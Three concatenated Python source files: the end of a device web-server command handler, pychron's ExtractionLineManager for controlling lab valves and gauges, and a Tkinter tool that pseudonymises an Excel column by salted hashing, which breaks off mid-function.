self.webserver.stop_ws_server()
self.webserver_running = False
return True
def get_handler(self):
'''
Get parameter of device
'''
input_args = len(self.input_string)
conf = self.webserver.device_provider.get_conf()
input_params_properties = conf['data']['inputParams']
select_param = None
if (input_args == 1):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if (i == len(input_params_properties)):
print("Usage: get [options]")
print("Option: ")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
param = self.webserver.device_provider.get_param(
{'paramId': select_param['paramId']})
print(param['data']['value'])
return True
def set_handler(self):
'''
Set parameter of device
'''
input_args = len(self.input_string)
conf = self.webserver.device_provider.get_conf()
input_params_properties = conf['data']['inputParams']
select_param = None
not_in_options = False
options = []
if input_args == 1:
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
return True
else:
i = 2
while i < len(input_params_properties):
select_param = input_params_properties[i]
if (select_param['argument'] == self.input_string[1]):
break
i += 1
if input_args == 2:
if i == len(input_params_properties):
print("Usage: set <options> <values>")
i = 2
while i < len(input_params_properties):
print(input_params_properties[i]['argument'])
i += 1
else:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
if select_param.__contains__('options'):
for item in select_param['options']:
if isinstance(item, dict):
options.append(int(item['key']))
else:
options.append(item)
if select_param['type'] == 'int64':
self.input_string[2] = int(self.input_string[2])
if select_param['type'] == "char8" and self.input_string[2] not in select_param['options']:
not_in_options = True
if select_param['type'] == "int64" and\
self.input_string[2] not in options:
not_in_options = True
if not_in_options:
print("Usage: set " + select_param['argument'] + " <values>")
print("values: ")
print(select_param['options'])
return True
self.webserver.device_provider.set_param({
'paramId': select_param['paramId'],
'value': self.input_string[2]
})
# TODO: display a response message to user
return True
def save_handler(self):
'''
Save device configuration
'''
self.webserver.device_provider.save_config()
return True
def server_start_handler(self):
'''
start a websocket server
'''
# self.webserver.start_websocket_server()
loop = None #asyncio.get_event_loop()
webserver_thread = threading.Thread(
target=self.start_webserver, args=(loop,))
webserver_thread.start()
self.webserver_running = True
return True
def exit_handler(self):
'''
Exit current process
'''
# self.webserver.stop()
#self.webserver_running = False
pid = getpid()
process = psutil.Process(pid)
process.kill()
def run_handler(self):
'''used by customers
'''
return True
|
extraction_line_manager.py | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import logging
import time
from socket import gethostbyname, gethostname
from threading import Thread
# =============enthought library imports=======================
from apptools.preferences.preference_binding import bind_preference
from pyface.timer.do_later import do_after
from traits.api import Instance, List, Any, Bool, on_trait_change, Str, Int, Dict, File, Float, Enum
from pychron.canvas.canvas_editor import CanvasEditor
from pychron.core.file_listener import FileListener
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.wait.wait_group import WaitGroup
from pychron.envisage.consoleable import Consoleable
from pychron.extraction_line import LOG_LEVEL_NAMES, LOG_LEVELS
from pychron.extraction_line.explanation.extraction_line_explanation import ExtractionLineExplanation
from pychron.extraction_line.extraction_line_canvas import ExtractionLineCanvas
from pychron.extraction_line.graph.extraction_line_graph import ExtractionLineGraph
from pychron.extraction_line.sample_changer import SampleChanger
from pychron.globals import globalv
from pychron.hardware.core.i_core_device import ICoreDevice
from pychron.managers.manager import Manager
from pychron.monitors.system_monitor import SystemMonitor
from pychron.pychron_constants import NULL_STR
class ExtractionLineManager(Manager, Consoleable):
"""
Manager for interacting with the extraction line
contains reference to valve manager, gauge manager and laser manager
"""
canvas = Instance(ExtractionLineCanvas)
canvases = List
plugin_canvases = List
explanation = Instance(ExtractionLineExplanation, ())
monitor = Instance(SystemMonitor)
switch_manager = Any
gauge_manager = Any
cryo_manager = Any
multiplexer_manager = Any
manometer_manager = Any
network = Instance(ExtractionLineGraph)
readback_items = List
runscript = None
learner = None
mode = 'normal'
valve_state_frequency = Int
valve_lock_frequency = Int
check_master_owner = Bool
use_network = Bool
display_volume = Bool
volume_key = Str
sample_changer = Instance(SampleChanger)
link_valve_actuation_dict = Dict
canvas_path = File
canvas_config_path = File
use_hardware_update = Bool
hardware_update_period = Float
file_listener = None
wait_group = Instance(WaitGroup, ())
console_bgcolor = 'black'
_active = False
_update_status_flag = None
_monitoring_valve_status = False
canvas_editor = Instance(CanvasEditor, ())
logging_level = Enum(LOG_LEVEL_NAMES)
def set_extract_state(self, *args, **kw):
pass
def activate(self):
self._active = True
self._load_additional_canvases()
self._activate_hook()
self.reload_canvas()
devs = self.application.get_services(ICoreDevice)
self.devices = devs
def deactivate(self):
if self.gauge_manager:
self.gauge_manager.stop_scans()
if self.monitor:
self.monitor.stop()
self._active = False
self._deactivate_hook()
def bind_preferences(self):
prefid = 'pychron.extraction_line'
attrs = ('canvas_path', 'canvas_config_path',
'use_hardware_update', 'hardware_update_period',
'check_master_owner', 'use_network', 'logging_level')
for attr in attrs:
try:
bind_preference(self, attr, '{}.{}'.format(prefid, attr))
except BaseException as e:
print('fffffffff', attr, e)
bind_preference(self.network, 'inherit_state', '{}.inherit_state'.format(prefid))
self.console_bind_preferences('{}.console'.format(prefid))
if self.gauge_manager:
bind_preference(self.gauge_manager, 'update_period', '{}.gauge_update_period'.format(prefid))
bind_preference(self.gauge_manager, 'use_update', '{}.use_gauge_update'.format(prefid))
if self.canvas:
bind_preference(self.canvas.canvas2D, 'display_volume', '{}.display_volume'.format(prefid))
bind_preference(self.canvas.canvas2D, 'volume_key', '{}.volume_key'.format(prefid))
def link_valve_actuation(self, name, func, remove=False):
if remove:
try:
del self.link_valve_actuation_dict[name]
except KeyError:
self.debug('could not remove "{}". not in dict {}'.format(name,
','.join(
list(
self.link_valve_actuation_dict.keys()))))
else:
self.debug('adding name="{}", func="{}" to link_valve_actuation_dict'.format(name, func.__name__))
self.link_valve_actuation_dict[name] = func
def enable_auto_reload(self):
self.file_listener = fm = FileListener(path=self.canvas_path,
callback=self.reload_canvas)
def disable_auto_reload(self):
if self.file_listener:
self.file_listener.stop()
def do_sample_loading(self):
"""
1. isolate chamber
2.
:return:
"""
sc = self._sample_changer_factory()
if sc:
if self.confirmation_dialog('Ready to Isolate Chamber'):
self._handle_console_message(('===== Isolate Chamber =====', 'maroon'))
if not sc.isolate_chamber():
return
else:
return
if self.confirmation_dialog('Ready to Evacuate Chamber'):
self._handle_console_message(('===== Evacuate Chamber =====', 'maroon'))
err = sc.check_evacuation()
if err:
name = sc.chamber
msg = 'Are you sure you want to evacuate the {} chamber. {}'.format(name, err)
if not self.confirmation_dialog(msg):
return
if not sc.evacuate_chamber():
return
else:
return
if self.confirmation_dialog('Ready to Finish Sample Change'):
self._handle_console_message(('===== Finish Sample Change =====', 'maroon'))
sc.finish_chamber_change()
def get_volume(self, node_name):
v = 0
if self.use_network:
v = self.network.calculate_volumes(node_name)[0][1]
return v
def test_cryo_communication(self):
self.info('test cryo communication')
ret, err = True, ''
if self.cryo_manager:
if self.cryo_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.cryo_manager.test_connection()
return ret, err
def test_gauge_communication(self):
self.info('test gauge communication')
ret, err = True, ''
if self.gauge_manager:
if self.gauge_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.gauge_manager.test_connection()
return ret, err
def test_connection(self):
self.info('test connection')
return self.test_valve_communication()
def test_valve_communication(self):
self.info('test valve communication')
print('asdf', self.switch_manager, hasattr(self.switch_manager, 'get_state_checksum'))
ret, err = True, ''
if self.switch_manager:
if hasattr(self.switch_manager, 'get_state_checksum'):
valves = self.switch_manager.switches
vkeys = sorted(valves.keys())
state = self.switch_manager.get_state_checksum(vkeys)
ret = bool(state)
return ret, err
def setup_status_monitor(self):
self.stop_status_monitor(id(self), block=True)
self.start_status_monitor(id(self))
self.refresh_states()
def stop_status_monitor(self, *args, **kw):
pass
def start_status_monitor(self, *args, **kw):
pass
def refresh_states(self, *args, **kw):
pass
def refresh_canvas(self):
# self.debug('refresh canvas')
for ci in self.canvases:
ci.refresh()
def finish_loading(self):
if self.use_network:
self.network.load(self.canvas_path)
self._set_logger_level(self.switch_manager)
def reload_canvas(self):
self.debug('reload canvas')
self.reload_scene_graph()
if self.use_network:
self.network.load(self.canvas_path)
sm = self.switch_manager
if sm:
sm.refresh_network()
for p in sm.pipette_trackers:
p.load()
for p in sm.pipette_trackers:
self._set_pipette_counts(p.name, p.counts)
self._reload_canvas_hook()
self.refresh_canvas()
def reload_scene_graph(self):
self.info('reloading canvas scene')
for c in self.canvases:
self.canvas_editor.load(c.canvas2D, self.canvas_path)
# c.load_canvas_file(c.config_name)
if self.switch_manager:
c.load_canvas_file(self.canvas_path, self.canvas_config_path, self.switch_manager.valves_path)
for k, v in self.switch_manager.switches.items():
vc = c.get_object(k)
if vc:
vc.soft_lock = v.software_lock
vc.state = v.state
def update_switch_state(self, name, state, *args, **kw):
# self.debug('update switch state {} {} args={} kw={}'.format(name, state, args, kw))
if self.use_network:
self.network.set_valve_state(name, state)
for c in self.canvases:
self.network.set_canvas_states(c, name)
for c in self.canvases:
c.update_switch_state(name, state, *args, **kw)
def update_switch_lock_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_lock_state(*args, **kw)
def update_switch_owned_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_owned_state(*args, **kw)
def set_valve_owner(self, name, owner):
"""
set flag indicating if the valve is owned by a system
"""
if self.switch_manager is not None:
self.switch_manager.set_valve_owner(name, owner)
def show_valve_properties(self, name):
if self.switch_manager is not None:
self.switch_manager.show_valve_properties(name)
def get_software_lock(self, name, **kw):
if self.switch_manager is not None:
return self.switch_manager.get_software_lock(name, **kw)
def set_software_lock(self, name, lock):
if self.switch_manager is not None:
if lock:
self.switch_manager.lock(name)
else:
self.switch_manager.unlock(name)
description = self.switch_manager.get_switch_by_name(name).description
self.info('{} ({}) {}'.format(name, description, 'lock' if lock else 'unlock'),
color='blue' if lock else 'black')
self.update_switch_lock_state(name, lock)
def get_state_checksum(self, vkeys):
if self.switch_manager is not None:
return self.switch_manager.calculate_checksum(vkeys)
def get_valve_owners(self):
if self.switch_manager is not None:
return self.switch_manager.get_owners()
def get_locked(self):
if self.switch_manager is not None:
return self.switch_manager.get_locked()
def get_valve_lock_states(self):
if self.switch_manager is not None:
return self.switch_manager.get_software_locks()
def get_valve_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_state_by_description(description)
else:
return self.switch_manager.get_state_by_name(name)
def get_indicator_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_indicator_state_by_description(description)
else:
return self.switch_manager.get_indicator_state_by_name(name)
def get_valve_states(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update)
def get_state_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update, version=1)
def get_lock_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_software_locks(version=1)
def get_valve_by_name(self, name):
if self.switch_manager is not None:
return self.switch_manager.get_switch_by_name(name)
def get_valve_names(self):
names = []
if self.switch_manager is not None:
names = self.switch_manager.get_valve_names()
return names
def get_pressure(self, controller, name):
if self.gauge_manager:
return self.gauge_manager.get_pressure(controller, name)
def get_device_value(self, dev_name):
dev = self.get_device(dev_name)
if dev is None:
self.unique_warning('No device named {}'.format(dev_name))
else:
return dev.get()
def disable_valve(self, description):
self._enable_valve(description, False)
def enable_valve(self, description):
self._enable_valve(description, True)
def lock_valve(self, name, **kw):
return self._lock_valve(name, True, **kw)
def unlock_valve(self, name, **kw):
return self._lock_valve(name, False, **kw)
def open_valve(self, name, **kw):
return self._open_close_valve(name, 'open', **kw)
def close_valve(self, name, **kw):
return self._open_close_valve(name, 'close', **kw)
def sample(self, name, **kw):
def sample():
valve = self.switch_manager.get_switch_by_name(name)
if valve is not None:
self.info('start sample')
self.open_valve(name, **kw)
time.sleep(valve.sample_period)
self.info('end sample')
self.close_valve(name, **kw)
t = Thread(target=sample)
t.start()
def cycle(self, name, **kw):
def cycle():
valve = self.switch_manager.get_switch_by_name(name)
if valve is not None:
n = valve.cycle_n
period = valve.cycle_period
self.info('start cycle n={} period={}'.format(n, period))
for i in range(n):
self.info('valve cycling iteration ={}'.format(i + 1))
self.open_valve(name, **kw)
time.sleep(period)
self.close_valve(name, **kw)
time.sleep(period)
t = Thread(target=cycle)
t.start()
def get_script_state(self, key):
return self.pyscript_editor.get_script_state(key)
def set_selected_explanation_item(self, obj):
if self.explanation:
selected = None
if obj:
selected = next((i for i in self.explanation.explanable_items if obj.name == i.name), None)
self.explanation.selected = selected
def new_canvas(self, config=None):
c = ExtractionLineCanvas(manager=self,
display_name='Extraction Line')
c.load_canvas_file(canvas_config_path=config)
self.canvases.append(c)
c.canvas2D.trait_set(display_volume=self.display_volume,
volume_key=self.volume_key)
if self.switch_manager:
self.switch_manager.load_valve_states()
self.switch_manager.load_valve_lock_states(force=True)
self.switch_manager.load_valve_owners()
c.refresh()
return c
def get_wait_control(self):
wd = self.wait_group.active_control
if wd.is_active():
wd = self.wait_group.add_control()
return wd
def set_experiment_type(self, v):
self.debug('setting experiment type={}'.format(v))
if self.cryo_manager:
self.cryo_manager.species = v
# =========== Cryo ==============================================================
def set_cryo(self, v, v2=None):
self.debug('setting cryo to {}, {}'.format(v, v2))
if self.cryo_manager:
return self.cryo_manager.set_setpoint(v, v2)
else:
self.warning('cryo manager not available')
return 0, 0
def get_cryo_temp(self, iput):
self.debug('get cryo temp {}'.format(iput))
if self.cryo_manager:
return self.cryo_manager.read_input(iput)
else:
self.warning('cryo manager not available')
return 0
# ===============================================================================
# ============= Manometer =======================================================
def get_manometer_pressure(self, idx=0):
self.debug('get manometer pressure')
ret = 0
if self.manometer_manager:
ret = self.manometer_manager.get_pressure(idx)
else:
self.warning('manometer manager not available')
return ret
# ===============================================================================
# ===============================================================================
# private
# ===============================================================================
def _load_additional_canvases(self):
for ci in self.plugin_canvases:
c = ExtractionLineCanvas(manager=self,
display_name=ci['display_name'], )
c.load_canvas_file(ci['canvas_path'], ci['config_path'], ci['valve_path'])
self.canvases.append(c)
def _activate_hook(self):
self.monitor = SystemMonitor(manager=self, name='system_monitor')
self.monitor.monitor()
if self.gauge_manager:
self.info('start gauge scans')
self.gauge_manager.start_scans()
if self.switch_manager and self.use_hardware_update:
do_after(1000, self._update)
def _update(self):
if self.use_hardware_update and self._active:
self.switch_manager.load_hardware_states()
self.switch_manager.load_valve_owners()
do_after(self.hardware_update_period * 1000, self._update)
def _deactivate_hook(self):
pass
def _reload_canvas_hook(self):
pass
def _log_spec_event(self, name, action):
sm = self.application.get_service('pychron.spectrometer.scan_manager.ScanManager')
if sm:
color = 0x98FF98 if action == 'open' else 0xFF9A9A
sm.add_spec_event_marker('{} ({})'.format(name, action),
mode='valve',
extra=name,
bgcolor=color)
def _enable_valve(self, description, state):
if self.switch_manager:
valve = self.switch_manager.get_valve_by_description(description)
if valve is None:
valve = self.switch_manager.get_switch_by_name(description)
if valve is not None:
if not state:
self.close_valve(valve.name)
valve.enabled = state
def _lock_valve(self, name, action, description=None, address=None, **kw):
"""
:param name:
:param action: bool True ==lock false ==unlock
:param description:
:param kw:
:return:
"""
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name=name)
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False
v = vm.get_switch_by_name(name)
if action:
v.lock()
else:
v.unlock()
self.update_switch_lock_state(name, action)
self.refresh_canvas()
return True
def _open_close_valve(self, name, action, description=None, address=None, mode='remote', **kw):
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name)
# check if specified valve is in the valves.xml file
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False, False
result = self._change_switch_state(name, mode, action, **kw)
self.debug('open_close_valve, mode={} result={}'.format(mode, result))
if mode == 'script':
invoke_in_main_thread(self.refresh_canvas)
if result:
if all(result):
valve = vm.get_switch_by_name(name)
description = valve.description
self._log_spec_event(name, action)
self.info('{:<6s} {} ({})'.format(action.upper(), valve.name, description),
color='red' if action == 'close' else 'green')
vm.actuate_children(name, action, mode)
ld = self.link_valve_actuation_dict
if ld:
try:
func = ld[name]
func(name, action)
except KeyError:
self.debug('name="{}" not in '
'link_valve_actuation_dict. keys={}'.format(name, ','.join(list(ld.keys()))))
return result
def _change_switch_state(self, name, mode, action, sender_address=None, **kw):
result, change = False, False
if self._check_ownership(name, sender_address):
func = getattr(self.switch_manager, '{}_by_name'.format(action))
ret = func(name, mode=mode, **kw)
self.debug('change switch state name={} action={} ret={}'.format(name, action, ret))
if ret:
result, change = ret
if isinstance(result, bool):
if change:
self.update_switch_state(name, True if action == 'open' else False)
return result, change
def _check_ownership(self, name, requestor, force=False):
"""
check if this valve is owned by
another client
if this is not a client but you want it to
respect valve ownership
set check_master_owner=True
"""
ret = True
if force or self.check_master_owner:
if requestor is None:
requestor = gethostbyname(gethostname())
self.debug('checking ownership. requestor={}'.format(requestor))
try:
v = self.switch_manager.switches[name]
ret = not (v.owner and v.owner != requestor)
except KeyError:
pass
return ret
def _set_pipette_counts(self, name, value):
for c in self.canvases:
scene = c.canvas2D.scene
obj = scene.get_item('vlabel_{}Pipette'.format(name))
if obj is not None:
obj.value = int(value)
c.refresh()
def _sample_changer_factory(self):
sc = self.sample_changer
if sc is None:
sc = SampleChanger(manager=self)
if sc.setup():
result = sc.edit_traits(view='chamber_select_view')
if result:
if sc.chamber and sc.chamber != NULL_STR:
self.sample_changer = sc
return sc
def _create_manager(self, klass, manager, params, **kw):
# try a lazy load of the required module
# if 'fusions' in manager:
# package = 'pychron.managers.laser_managers.{}'.format(manager)
# self.laser_manager_id = manager
if 'rpc' in manager:
package = 'pychron.rpc.manager'
else:
package = 'pychron.managers.{}'.format(manager)
if manager in ('switch_manager', 'gauge_manager', 'multiplexer_manager', 'cryo_manager', 'manometer_manager'):
if manager == 'switch_manager':
man = self._switch_manager_factory()
self.switch_manager = man
return man
else:
return getattr(self, manager)
else:
class_factory = self.get_manager_factory(package, klass, warn=False)
if class_factory is None:
package = 'pychron.extraction_line.{}'.format(manager)
class_factory = self.get_manager_factory(package, klass)
if class_factory:
m = class_factory(**params)
self.add_trait(manager, m)
return m
else:
self.debug('could not create manager {}, {},{},{}'.format(klass, manager, params, kw))
def _set_logger_level(self, obj=None):
level = LOG_LEVELS.get(self.logging_level, logging.DEBUG)
if obj:
getattr(obj, 'logger').setLevel(level)
if hasattr(obj, 'set_logger_level_hook'):
obj.set_logger_level_hook(level)
# ===============================================================================
# handlers
# ===============================================================================
def _logging_level_changed(self, new):
if new:
self._set_logger_level(self)
if self.switch_manager:
self._set_logger_level(self.switch_manager)
@on_trait_change('use_hardware_update')
def _update_use_hardware_update(self):
if self.use_hardware_update:
do_after(1000, self._update)
@on_trait_change('switch_manager:pipette_trackers:counts')
def _update_pipette_counts(self, obj, name, old, new):
self._set_pipette_counts(obj.name, new)
@on_trait_change('use_network,network:inherit_state')
def _update_network(self):
from pychron.canvas.canvas2D.scene.primitives.valves import Valve
if not self.use_network:
for c in self.canvases:
scene = c.canvas2D.scene
for item in scene.get_items():
if not isinstance(item, Valve):
item.active_color = item.default_color
else:
item.active_color = item.oactive_color
else:
net = self.network
if self.switch_manager:
for k, vi in self.switch_manager.switches.items():
net.set_valve_state(k, vi.state)
self.reload_canvas()
@on_trait_change('display_volume,volume_key')
def _update_canvas_inspector(self, name, new):
for c in self.canvases:
c.canvas2D.trait_set(**{name: new})
def _handle_state(self, new):
# self.debug('handle state {}'.format(new))
if isinstance(new, tuple):
self.update_switch_state(*new)
else:
# n = len(new)
for i, ni in enumerate(new):
self.update_switch_state(*ni)
# self.update_switch_state(refresh=i == n - 1, *ni)
def _handle_lock_state(self, new):
self.debug('refresh_lock_state fired. {}'.format(new))
self.update_switch_lock_state(*new)
def _handle_owned_state(self, new):
self.update_switch_owned_state(*new)
def _handle_refresh_canvas(self, new):
# self.debug('refresh_canvas_needed fired')
self.refresh_canvas()
def _handle_console_message(self, new):
color = None
if isinstance(new, tuple):
msg, color = new
else:
msg = new
if color is None:
color = self.console_default_color
if self.console_display:
self.console_display.add_text(msg, color=color)
# ===============================================================================
# defaults
# ===============================================================================
def _manometer_manager_default(self):
from pychron.extraction_line.manometer_manager import ManometerManager
return ManometerManager(application=self.application)
def _cryo_manager_default(self):
from pychron.extraction_line.cryo_manager import CryoManager
return CryoManager(application=self.application)
def _gauge_manager_default(self):
from pychron.extraction_line.gauge_manager import GaugeManager
return GaugeManager(application=self.application)
def _switch_manager_factory(self):
klass = self._get_switch_manager_klass()
vm = klass(application=self.application)
vm.on_trait_change(self._handle_state, 'refresh_state')
vm.on_trait_change(self._handle_lock_state, 'refresh_lock_state')
vm.on_trait_change(self._handle_owned_state, 'refresh_owned_state')
vm.on_trait_change(self._handle_refresh_canvas, 'refresh_canvas_needed')
vm.on_trait_change(self._handle_console_message, 'console_message')
bind_preference(vm, 'valves_path', 'pychron.extraction_line.valves_path')
return vm
def _get_switch_manager_klass(self):
from pychron.extraction_line.switch_manager import SwitchManager
return SwitchManager
def _explanation_default(self):
e = ExtractionLineExplanation()
if self.switch_manager is not None:
e.load(self.switch_manager.switches)
self.switch_manager.on_trait_change(e.refresh, 'refresh_explanation')
return e
def _canvas_default(self):
return self.new_canvas()
def _network_default(self):
return ExtractionLineGraph()
if __name__ == '__main__':
elm = ExtractionLineManager()
elm.bootstrap()
elm.canvas.style = '2D'
elm.configure_traits()
# =================== EOF ================================
|
PseudoDialogOptionsGrid.py | from tkinter import ttk
import tkinter as tk
import tkinter.filedialog as fd
import pandas as pd
import threading
import hashlib
import os
import pandas.io.formats.excel
import logging
from logging.handlers import RotatingFileHandler
import pem
import gc
import sys
pandas.io.formats.excel.header_style = None
class App(tk.Tk):
def __init__(self):
super().__init__()
self.resizable(False, False)
self.geometry("500x320")
self.title("Simple Pseudonymiser")
self.welcomeLabel = tk.Label(self, text="Welcome to the Simple Pseudonymiser")
self.welcomeLabel.pack(padx=60, pady=10)
self.logger = logging.getLogger()
handler = RotatingFileHandler("pseudo_log.log", maxBytes=10 * 1024 * 1024, backupCount=5)
formatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
style = ttk.Style()
style.configure("foreGreen.Label", foreground="green")
style.configure("foreRed.Label", foreground="red")
style.configure("foreOrange.Label", foreground="coral4")
style.configure("button.flat", relief="flat")
self._fileName = tk.StringVar()
self._result = tk.StringVar()
self._salt = tk.StringVar()
self._saltOutput = tk.StringVar()
self._pseudoOutput = tk.StringVar()
self._inputFileName = tk.StringVar()
self._resultOutput = tk.StringVar()
self._pseudoOutput.set("Pseudonymise the file")
self.btn_salt = ttk.Button(self, text="Choose a cert/pem file to generate your salt",
command=self.choose_pem_file, width=100)
self.btn_salt.pack(padx=60, pady=10)
self.btn_file = ttk.Button(self, text="Choose excel file and the select column to pseudo",
command=self.choose_file, state="disabled", width=100)
self.btn_file.pack(padx=60, pady=10)
self.menu_label_text = tk.StringVar()
self.menu_label_text.set("Choose the excel column that you would like to have pseudonymised")
self.menu_label = tk.Label(self, textvariable=self.menu_label_text)
self.options = ['']
self.om_variable = tk.StringVar(self)
self.om = ttk.OptionMenu(self, self.om_variable, *self.options)
self.om.configure(width=60)
self.alwaysActiveStyle(self.om)
self.om['state'] = 'disabled'
self.om_variable.trace("w", self.option_menu_selection_event)
self.btn_pseudo = ttk.Button(self, textvariable=self._pseudoOutput,
command=self.pseudonymize_file, state="disabled", width=100)
self.resultLabel = ttk.Label(self, textvariable=self._resultOutput,
width=400, wraplength=390, font=('Helvetica', 9, 'bold'))
self.resultLabel.configure(style="foreGreen.Label", anchor="center")
self.processing_bar = ttk.Progressbar(self, orient='horizontal', mode='determinate', length=400)
def report_callback_exception(self, exc, val, tb):
exc_type, exc_value, exc_traceback = sys.exc_info()
self.logger.error('exception line: ' + str(exc_traceback.tb_lineno) + ' error: ' + str(exc_value))
self.destroy_unmapped_children(self)
self.btn_pseudo.pack(padx=60, pady=10)
def alwaysActiveStyle(self, widget):
widget.config(state="active")
widget.bind("<Leave>", lambda e: "break")
def show_pickers(self):
self.menu_label.pack(padx=60, pady=0)
self.om.pack(padx=60, pady=10)
self.alwaysActiveStyle(self.om)
self.btn_pseudo.pack(padx=60, pady=10)
def hide_pickers(self):
self.menu_label.pack_forget()
self.om.pack_forget()
self.btn_pseudo.pack_forget()
def destroy_unmapped_children(self, parent):
"""
Destroys unmapped windows (empty gray ones which got an error during initialization)
recursively from bottom (root window) to top (last opened window).
"""
children = parent.children.copy()
for index, child in children.items():
if not child.winfo_ismapped():
parent.children.pop(index).destroy()
else:
self.destroy_unmapped_children(child)
def choose_salt_file(self):
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("Text File", "*.txt"),)
filepath = fd.askopenfilename(title="Open PEM file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
self._salt.set(filepath)
with open(self._salt.get()) as f:
self._salt.set(f.readline())
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_pem_file(self):
if self.resultLabel.winfo_ismapped():
self.resultLabel.pack_forget()
self.btn_file['state'] = 'disabled'
self._salt.set("")
file_types = (("crt file", "*.crt"), ("cert file", "*.cert"), ("pem file", "*.pem"))
filepath = fd.askopenfilename(title="Open pem or cert file", filetypes=file_types)
exists = os.path.isfile(filepath)
if exists:
certs = pem.parse_file(filepath)
self._salt.set(filepath)
self._salt.set(certs[0].sha1_hexdigest)
self._saltOutput.set("Your salt term is " + self._salt.get()[4:].rjust(len(self._salt.get()), "*"))
self.btn_file['state'] = 'normal'
self.logger.info('Salt Loaded')
def choose_file(self):
if self.resultLabel.winfo_ismapped():
self.resultLabel.pack_forget()
self.btn_pseudo['state'] = 'disabled'
self._fileName.set("")
file_types = (("xlsx", "*.xlsx"),)
filepath = fd.askopenfilename(title="Open file", filetypes=file_types)
exists = os.path.isfile(filepath)
self.hide_pickers()
if exists:
self.btn_salt['state'] = 'disabled'
self.btn_file['state'] = 'disabled'
self._fileName.set(filepath)
self._inputFileName.set(os.path.basename(self._fileName.get()))
self.btn_pseudo['state'] = 'normal'
self._resultOutput.set("")
self.logger.info('Data File Loaded ' + self._fileName.get())
first_row = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8', nrows=1)
first_row.columns = first_row.columns.str.strip().str.lower().str.replace(' ', '_').str.replace('(',
'').str.replace(
')', '')
self.options = list(first_row)
self.update_option_menu()
self.om['state'] = 'normal'
self.om_variable.set(self.options[0])
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
self.show_pickers()
self.btn_salt['state'] = 'normal'
self.btn_file['state'] = 'normal'
del first_row
gc.collect()
def update_option_menu(self):
menu = self.om["menu"]
menu.delete(0, "end")
for string in self.options:
menu.add_command(label=string,
command=lambda value=string: self.om_variable.set(value))
def option_menu_selection_event(self, *args):
self._pseudoOutput.set("Pseudonymise the column " + self.om_variable.get())
pass
def pseudo(self, x):
sentence = str(x) + self._salt.get()
return str(hashlib.blake2s(sentence.encode('utf-8')).hexdigest())
def pseudonymize_file(self):
self.logger.info('Starting Pseudo: ' + self._fileName.get())
self.processing_bar.pack(padx=60, pady=10)
if not self.resultLabel.winfo_ismapped():
self.resultLabel.pack(padx=60, pady=10)
self.processing_bar.start(1000)
t = threading.Thread(target=self.pseudonymize_file_callback)
t.start()
def kill_progress(self):
self.processing_bar.stop()
self.processing_bar.pack_forget()
def get_extension(self, filename):
filename, file_extension = os.path.splitext(filename)
return file_extension if file_extension else None
def get_file_display_name(self, filename):
temp_name = os.path.basename(filename);
return temp_name[:15] + ('..' + self.get_extension(temp_name) if len(temp_name) > 15 else '')
def pseudonymize_file_callback(self):
try:
self.btn_pseudo['state'] = 'disabled'
self.btn_file['state'] = 'disabled'
self.btn_salt['state'] = 'disabled'
temp_name = self.get_file_display_name(self._fileName.get())
self.resultLabel.config(style="foreOrange.Label")
self._resultOutput.set(temp_name + " is being loaded")
self.update()
df = pd.read_excel(self._fileName.get(), dtype='str', encoding='utf-8')
df.columns = df.columns.str.strip().str.lower()\
.str.replace(' ', '_').str.replace('(', '').str.replace(')', '')
temp_name = str(self._fileName.get())
temp_name = temp_name.replace(".xlsx", "_psuedo.xlsx")
new_name = temp_name
self.btn_pseudo['state'] = 'disabled'
self.resultLabel.config(style="foreOrange.Label")
temp_name = self.get_file_display_name(self._fileName.get())
self._resultOutput.set(temp_name + " is being pseudonymised")
self.config(cursor="wait")
self.update()
df['DIGEST'] = df[self.om_variable.get()].apply(self.pseudo)
del df[self.om_variable.get()]
self._result.set(os.path.basename(temp_name))
if os.path.exists(new_name):
os.remove(new_name)
